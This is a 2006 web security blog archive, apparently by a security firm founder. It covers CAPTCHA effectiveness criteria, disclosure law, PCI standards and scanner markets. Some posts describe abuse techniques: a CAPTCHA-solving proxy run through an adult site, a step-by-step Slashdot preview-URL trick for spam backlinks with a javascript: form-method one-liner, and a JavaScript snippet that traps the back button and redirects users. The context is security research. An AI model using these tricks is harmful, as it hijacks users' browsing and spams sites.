What hopefully Mr. Zweiback and others realize is that the REAL "bad guys", the profit-driven, extortionist, identity-thieving, scamming, fraudulent, criminal scum-of-the-earth, are not going to stop. And they're certainly not going to disclose their findings and risk prosecution either. Everything gets a pen-test, with permission or otherwise. What this prosecution means is the "good guys" will think twice about discovering or disclosing anything they might uncover or stumble upon. If one of the few precious checks-and-balances the industry has is out of the picture, then who's on the side of the consumer? PCI? Please. There are 96,854,877 sites out there. I'm guessing way less than 1% are professionally assessed for security.

As for Eric McCarty, I wish him the best of luck, and hopefully he'll be able to continue pursuing his career.

CAPTCHA Effectiveness Test

Update 1: The list has been slightly improved and also added examples of how the test should be applied.

Update 2: Using pornography websites, there is a clever technique leveraging humans that works well in defeating CAPTCHA’s (a comment on my last post found an early reference). An attacker offers a free adult website granting access to any visitor who fills out CAPTCHA images. The website, acting as a CAPTCHA proxy, downloads the obfuscated image from the target then redisplays it to the visitor. Once the visitor fills out an image, or two, or three, they are granted access. The attacker is then free to perform their intended action. Effective, simple, and what caused me to add #4 to the CET.


CAPTCHA
"Completely Automated Public Turing Test to Tell Computers and Humans Apart"

Just about everyone on-line has seen or typed in one of these by now, even if they didn't know exactly what it was for. CAPTCHA's are designed to prevent automated account registration, blog spam, BBS spam, whois DB lookups, login brute-force, password recovery, etc. People have attempted all sorts of strange and interesting methods to stop the bots. The obfuscated-text-in-an-image variety is the one most commonly used. The problem is not all CAPTCHA systems are created equal. Some are superior to others, but it's difficult to tell exactly why. What we web application security people need is a methodology to measure the effectiveness of a CAPTCHA system. I first wrote about the CAPTCHA Effectiveness Test just over a year ago and promised to eventually make an update.

CAPTCHA Effectiveness Test

1) Test should be administered where the human and the server are remote over the network.
2) Test should be simple for humans to pass.
* Humans should fail less than 0.1% on the first attempt.
3) Test should be solvable by humans in no more than a few seconds.
4) Test should only be solvable by the human to which it was presented.
5) Test should be hard for a computer to pass
* Correctly guessing the answer should be less than 1 in 1,000,000, even after 24-hours of analysis.
6) Knowledge of previous test questions, answers, results, or combination thereof should not impact the predictability of following tests.
7) Test should not discriminate against humans with visual or hearing impairments.
8) Test should not possess a geographic, cultural, or language bias.


Applying the CET.
Given that the implementation is secure (many are not).

obfuscated-text-in-an-image
1) Pass
2) Pass
3) Pass
4) Fail
5) Pass
6) Pass
7) Fail
8) Pass

Hot Captcha
1) Pass
2) Fail
3) Pass
4) Fail
5) Pass
6) Fail
7) Fail
8) Fail



Still a work in progress...


Tuesday, September 05, 2006

JavaScript Malware embedded in everything

pdp (architect) from gnucitizen has been on a tear releasing new methods of injecting JavaScript Malware into a web browser. Most recently with backdooring QuickTime Movies and Flash Objects, complete with visual tutorials and source code. Then pdp has the AttackAPI, which "provides simple and intuitive web programmable interface for composing attack vectors with JavaScript and other client (and server) related technologies." I haven't had time to play with it yet, but it looks really cool! Nice job pdp, keep up the good work!

Let's stop for a moment and take stock of where we are with web browser security.

JavaScript: Bad
Flash: Bad
QuickTime: Bad
PDF: Bad
Applets: Bad
ActiveX: Very Bad
Firefox Extensions: Safe, but vultures are circling.
CSS: Safe, but vultures are circling.

Now what about mp3's, wmv's, midi's, etc.? Do these have facilities for including JavaScript? Maybe it's time to go back to Lynx. But then what fun would the world be? :)

Firefox is smart!

I was messing around with infinite 302 redirects using the URL shorteners. I set up the following URL's: http://doiop.com/302_1 redirects to http://doiop.com/302_2, which redirects back to http://doiop.com/302_1.

When I tested in Firefox (1.5.0.6), lo and behold, it detected it!


Firefox has detected that the server is redirecting the request for this address in a way that will never complete.
* This problem can sometimes be caused by disabling or refusing to accept cookies.

Bob Auger from cgisecurity.com helped me test in Internet Explorer 6. The browser just sat there trying to load. Not so smart.

Hey, I can see my office!

I know it's old to most people, yet the coolness factor of Google Earth never fails to impress me. If you had said back in the 90's that this level of information access would be in the hands of anyone with a PC, well, you'd either be raising VC cash or called crazy (maybe both). Plus, I live and work in Silicon Valley (southern half of the northern California bay area), where a lot of the cutting-edge technology is developed. Having grown up in Maui and now being in the center of it all also amazes me. Driving to lunch, the market, work, the gym, etc., you're likely to see the headquarters of the world's tech-giants. No matter where you go you overhear people talking techno-babble. If you're a techno-nerd, this is the place to be.

Still, the question I often get is why I moved. Other than this is where I need to be to run WhiteHat, I don't have a solid answer. Though I do take my vacations on Maui. :)

WhiteHat Security Headquarters


Cool technology companies within 15min of each other

Netcraft Survey Says! 96,854,877 sites

That's about 1 site for every 3 people in the United States.

September 2006 Web Server Survey
"Growth is being driven by two trends: the popularity of blogging services, and the heated battle between Microsoft and Google for new users for their web platforms. Huge growth continues at Windows Live Spaces, Microsoft's free blogging/networking service,"

I'll bet you a 0-day that most of these are splogs.

How do you go about securing millions of websites? There is no silver-bullet solution to look forward to. We'll have to use everything in the arsenal (security in the SDLC, security assessments, web application firewalls, source code audits, secure configuration, CAPTCHA's, browser toolbars, etc.).


Questions loom over PCI compliance

A timely article by SearchAppSecurity, Expected PCI standard update raises concerns for Web app security, digs into the webappsec PCI standard mystery. The question is, are the powers that be going to gut the PCI standard? According to communication received by certified PCI scanning vendors, there is supposed to be a drop of 8 of the OWASP Top 10, leaving only Cross-Site Scripting (XSS) and SQL Injection. Then, almost contradictorily, a MasterCard spokesperson said: "...there are no plans to make any of the PCI Data Security Standard requirements less robust. Any future enhancements to the standard are intended to foster broad compliance without compromising the underlying security requirements of the current standard." As always, the answer to 99 questions out of 100 is money.

For those unfamiliar, the Payment Card Industry Data Security Standard (PCI DSS) is a mandate from Visa, MasterCard, AMEX, Discover, and JCB dictating how merchants (handling over 20K CC transactions per year) must protect the data. Merchants must also have their publicly facing networks and websites scanned for vulnerabilities every 3 months by a certified scanning vendor (WhiteHat Security is on the list). Network scanning is fairly common and reasonably inexpensive. For anything less than a class-C network, it'll normally cost only several thousand dollars since the process is highly commoditized and supremely automated. To contrast, web application security assessments typically run anywhere from 8K to 20K per website. Web application security assessments take quite a bit of technical expertise and the process is comparably manual (including scanning for XSS and SQL Injection). While continuous services like WhiteHat Sentinel are pushing costs down and quality up, pricing is still going to be a long way off from that of network-layer scanning.

The credit card brands would love to enforce really strong standards. The key factor is customer adoption. Many, perhaps most, of the larger merchants are already moving towards a continuous and comprehensive webappsec program regardless of PCI. However, smaller and mid-sized merchants may revolt if the jump in the cost of doing business to comply is too great. The PCI DSS committee's challenge is finding the proper balance between security and affordable pricing. They're asking themselves, "What if we say only scan for the stuff that can be automated? 1) Will that be cheap enough? 2) Will that make a difference in website security?"

1) Possibly
Too much cost is relative to the merchant and the number of websites they happen to have. Obviously paying nothing is more desirable than paying anything. It's the responsibility of the scanning vendors, and the market opportunity, to drive cost-effective solutions. (Bias warning: I think WhiteHat Sentinel is that solution)

2) Definitely not.
I'll keep saying it. It only takes a single vulnerability to seriously impact an online business. The bad guys know that. Unless you're prepared to find all the vulnerabilities all the time (the goal), what you're getting is not security.

Monday, September 04, 2006

How to get linked from Slashdot

A 5 step process, making use of Slashdot's PreviewStory feature, to create URL's that link anywhere and say anything.

1) Go to Slashdot's story submissions page and fill out the form.
* Include links and text pointing back to your website. (Shorter is better)

2) Convert the form method from "POST" to "GET".
* I use the Web Developer extension for Firefox. (See screenshot; a one-line alternative appears after the list.)

3) Click "PreviewStory".

4) Copy the Preview Page URL.
* Should look something like...
http://slashdot.org/submit.pl?reskey=drB7oIuT5zrHsfhHtr7S&name=He+who&email=&
subj=How+to+get+linked+from+Slashdot&primaryskid=0&tid=133&story=Shiny+new+
Slashdot+link+to+my+blog%2C+%3Ca+href%3D%22http%3A%2F%2Fjeremiahgrossman.
blogspot.com%2F%22%3EJeremiah+Grossman%3C%2Fa%3E.

Snipping off "op=PreviewStory" makes the link last longer. If you want to shorten the URL snip off "&sub_type=html", maybe "primaryskid=0&tid=133", or use TinyURL.

5) Link to the Preview Page URL from some other webpage.
* Wait for the search engine crawlers. (Slashdot is now linking to you)
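If you don't have the Web Developer extension handy, a javascript: URL typed into the location bar can flip the method for step 2 instead. This assumes the submission form is the first form on the page, which may not be the case.

javascript:void(document.forms[0].method='get')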


Voila.


Preview Page Screenshot:



Some answered questions

a) Will I get Slashdot'ed by using this?
No. You're unlikely to get visitor traffic from this type of link.

b) Does Google, Yahoo, MSN index the Preview Page URL?
Yes.

c) Is Slashcode the only software open to this?
No. The same technique also works on many blogs, message boards, guestbooks, and comment systems. Just look for the preview feature.

d) Are the Black Hat SEO's using this?
Of course. In fact it's possible to automate the discovery of websites using Slashcode and generate the Preview Page URL's dynamically.

Sunday, September 03, 2006

Vulnerability "discovery" more important than disclosure

The vulnerability "disclosure" debate isn't going away. A post at StillSecure, After All These Years has some nice links to experts boiling down their respective arguments attempting to balance researcher ethics, user security, and vendor responsibility. My question is, "what happens to our security when researchers lose the legal ability to discover vulnerabilities in the software that's the most important (custom web applications)?"

By their nature, custom web applications are hosted on someone else's servers and available nowhere else. Attempting to find vulnerabilities of any kind on machines other than your own is frowned upon as being potentially illegal. Who cares about disclosure when we can’t even go about finding security issues without running the risk of going to jail? Those who say, "do not test a system without written consent", offer good but also short-sighted advice. The InfoSec community hasn't dealt with the legal issues of "discovering" vulnerabilities, only with "disclosing" them.

Traditionally researchers have played the role of Good Samaritan by finding vulnerabilities in software readily available to them. We're rapidly moving towards a world where the software that holds our most sensitive information (online banks, stores, IRS, etc.) is not PC desktop software. The same people who provide that layer of community oversight run into a very real problem besides ethics: a threat to their personal freedom. I’d wager there are few top researchers willing to risk incarceration in pursuit of a few Cross-Site Scripting and SQL Injection issues. Organizations providing the web-based services are also not going to be handing out hack-me-if-you-can authorization letters. And with few people looking, software security naturally degrades. That's probably why 8 out of 10 websites have vulnerabilities.

Saturday, September 02, 2006

Intercept the web browser back button

While working on a (yet-to-be-released) JavaScript hack, I needed a method to intercept the browser back button to prevent users from leaving a web page, and hence keep the thread of control. AJAX programmers also need to support the back button when moving through session states on the same page. From what I can tell, the "normal" way to do this is by using link anchors. I wanted something simpler and more forceful. Here's a technique I found using Firefox (1.5.0.6).

// Grab the document body and attach an onunload handler (tested in Firefox 1.5.0.6).
var body = document.getElementsByTagName('body');
body[0].setAttribute("onunload", "backButtonDestroyer()");

// When the user tries to navigate away (e.g. presses Back), halt whatever
// the browser is doing and send it to a location of our choosing.
function backButtonDestroyer() {
  window.stop();
  window.location = 'http://jeremiahgrossman.blogspot.com/';
}

Note: If someone has previously published this technique (I couldn't find it), let me know and I'll link to you. Thanks.



Friday, September 01, 2006

Where the Web Application Security Market is Heading

A recent article from SD Times, Slipping In The Side Door With App Security Message, describes how web application security scanner (SPI Dynamics, Fortify, Watchfire, Secure Software, etc.) vendors approach the market and where they believe things are heading. While I agree with these guys on many issues, I disagree with most of their conclusions and predictions cited within. Before firing away let's make it totally clear that I am 100% biased when it comes to web application vulnerability assessment solutions. If my ideas make sense to you, great, if not, that's OK, you've seen the opposite view.

Article Main Points:

Customers who don't buy don't get it.
(Wrong)

Today's customers DO get it, and those who don't WANT TO. Black Hat's record web application security presence and the thousands of attendees filling the sessions are one testament to that. Informative articles, books, reports, tutorials, technical conversations, and hacks are published daily educating the customer. However, customer education comes with increased expectations of vendors. Smoke-and-mirrors sales tactics are unimpressive to the well informed. And if a customer didn't buy, it doesn’t mean they don't take web application security seriously. It probably means the solution wasn't what they needed. Or wanted.

Developers don’t see security as part of their role.
(Yes they do)
A developer’s responsibility is converting design specifications into a software implementation. Asking developers to use additional tools that interfere with the programming process will never be mainstream. That premise is in direct conflict with their role and the interests of the business. Developers want security baked into the programming languages and software libraries they use. Think Java. Think dotNET. What they WANT is code that’s secure from the beginning, scanning or no scanning. If you have a product that speeds code creation that also happens to be secure, then you have something of real value. Interests are in alignment.

White-Box / Black-Box combo is greater than the sum of its parts.
(Maybe)
I've talked about it before; white or black box scanning is only capable of testing for about half of the potential vulnerabilities. Mostly technical vulnerabilities like Cross-Site Scripting and SQL Injection, and not even those all of the time. The contextual business logic issues remain ignored. Combining two incomplete solutions will not add up to something comprehensive. Besides, these tools largely overlap in what they find anyway. But I want to be fair; this type of tight product integration is new, so I guess we'll wait and see how the performance turns out.

The market is heading towards more tools.
(That's where some vendors are heading, not the market.)
Customers want solutions that find all the vulnerabilities all the time (the goal) before and after software release. Tools aren’t going to accomplish that. We know it only takes a single vulnerability to seriously impact an online business. And just as it happened in the network VA space, the web application security vulnerability assessment market will be dominated by service providers. Customers and service providers figured out that finding vulnerabilities is just one small piece of the puzzle. It takes a lot of infrastructure to continuously assess dozens/hundreds/thousands of websites, manage the vulnerability remediation process, and fulfill compliance obligations with third-party validation.

Video - Hacking Intranet Websites from the Outside

We posted the video of our much-acclaimed Black Hat talk, Hacking Intranet Websites from the Outside (MPEG-4), "JavaScript malware just got a lot more dangerous". Slides and proof-of-concept code are available for those interested. Thanks again to RSnake for helping us out and to everyone we hung out with who made the trip a blast.